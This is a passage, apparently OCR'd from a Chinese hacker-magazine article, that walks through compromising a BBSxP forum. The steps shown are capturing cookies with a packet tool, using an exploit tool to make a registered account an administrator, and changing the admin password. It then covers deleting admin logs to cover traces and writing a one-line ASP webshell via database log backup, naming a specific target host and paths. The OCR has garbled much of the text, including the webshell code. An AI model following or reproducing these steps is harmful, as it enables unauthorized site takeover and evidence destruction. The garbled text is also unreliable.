如发现有乱码，请点击下面链接浏览原文
正文摘录:

家，点击“打开”图标，找到IE进程中关于BBsxP发贴的这个lEXPLORE.exe，点“打开”。把winSO(：k专家最小化放到一边，在刚才的帖子里点“编辑”图标，这个时候winsock专家里的数据包会狂飙，赶紧点上“暂停”图标，让它停下来，如图3。这里红蓝相间的数据信息就是刚才编辑帖子的所有内容，找到send(发送)消息的那一行，单击选中它，底下会显示发出的消息，我们需要的是cookies那一部分，把它整个的复制下来(包括“cookies：”)放到利用工具里，如图4。图3图4把刚才编辑帖子的地址http：／／h1.cnvip.cc／EditPost.asp?ThreadID=965&PostID=ll259填到“目标主机”中，在指定的用户名填写自己刚注册的ID，我这里就写“zj1244”了。默认的操作是“修改指定用户为管理员”，单击“发送”按钮，提示“可能成功咯”。同头查看卜zj1244的资料如图5，我们已经是管理员了。用htr文件类型拿she1】的方法不是很通用，这里用的是备份日志的方法。在备份日志拿webshell之前，我们有一个最基本的步骤就是知道目标网站的物理路径，它需要进到后台，这很简单。在利用工具中，把下拉框选为“改后台密码为指定用户的密码”，单击“发送”。现在后台的管理密码就被改成我们的注册密码了，点“管理”出现后台登录页面，输入自己刚注册时使用的密码顺利进入后台。在左边的“其他功能”项里找到“主机环境变量”，可以看到“本文件请求的物理路径”是f：＼usr＼cn31004＼Admmother.asp，如图6。知道了物理路径就好办多了，先在下拉框中选择“还原后台密码”，以免管理员这时候进不去后台了。再删除“指定用户的后台日志”让我们的每…点蛛丝马迹都消失。图6现在再单击“获得库名”，程序就会自动读取数据库的名称存放到自己的电子邮件处，通过查看自己的个人资料可以看到。我得到的是cn3l004db，‘一。会备份日志的时候需要用到它，把它记录下来。在下拉框中选择“日志备份获得webshell”，会出现“代码”和“路径”两个文本榧，它的作爿j足把指定代码写到该路径中。住这里，把代码处写为：I--。＜％evelrequest(chr。(35]).respon~eend％’IJ路径处填为f：＼usr＼cn31004＼zjl244.asp，库名是cn31004dh，单击“提交”后即可得到websheu了。现在的http：／／h1.cnvip.cc／zjl244.asp就是包含了一句话木马的小马，大家按照菜鸟学堂里的方法连接上去小马传大马就可以轻松的控制整个网站了。有的时候备份完以后，访问我们指定的马儿会提示404错误，也就是说，并没有备份成功，这可能跟管理员设置了DBO权限的数据库帐弓不允许备份数据库有关，大家可以把差异备份和日志备份都试一遍，如果全都失败了，建议换下一个目标进行测试吧。四、拿到sheII(文章中涉及到的BBs×P7.oBeta2sQL最新漏洞凶为现在的服务器windows2003居多，因此利用工具已收录到光盘中。)匾